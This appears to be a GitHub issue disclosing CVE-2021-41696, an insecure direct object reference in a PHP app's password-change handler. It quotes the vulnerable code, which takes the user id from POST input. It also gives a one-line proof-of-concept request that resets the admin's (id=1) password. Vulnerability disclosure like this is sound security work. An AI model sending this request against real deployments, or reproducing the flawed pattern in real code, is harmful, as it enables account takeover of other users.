Skip to content

[CVE-2021-41696] IDOR vulnerability in the password change procedure allows changing a password of any user #17

Description

@Sh4d0v

Note: The same type of IDOR vuln exists in a lot of other functions in user.php, but password change is most critical.
requests\user.php:

<?php case 'changep': $password = secureEncode($_POST['new_password']); if (strlen($password) < 6) { echo 'Error - '.$sm['lang'][654]['text']; exit; } $salt = base64_encode($_POST['new_password'].secureEncode($_POST['user'])); $pswd = crypt($password,$salt); $query = "UPDATE users SET pass = '".$pswd."',imported = '' WHERE id = '".secureEncode($_POST['user'])."'"; $mysqli->query($query); break;

Id value in the UPDATE query is controlled by user input. Any auth user can change a password for admin (id=1) or any other user.

Exploit POC would be something like:

POST /requests/user.php HTTP/1.1 action=changep&user=1&new_password=12345678

Metadata

Metadata

Assignees

No one assigned

    Projects

    No projects

    Milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions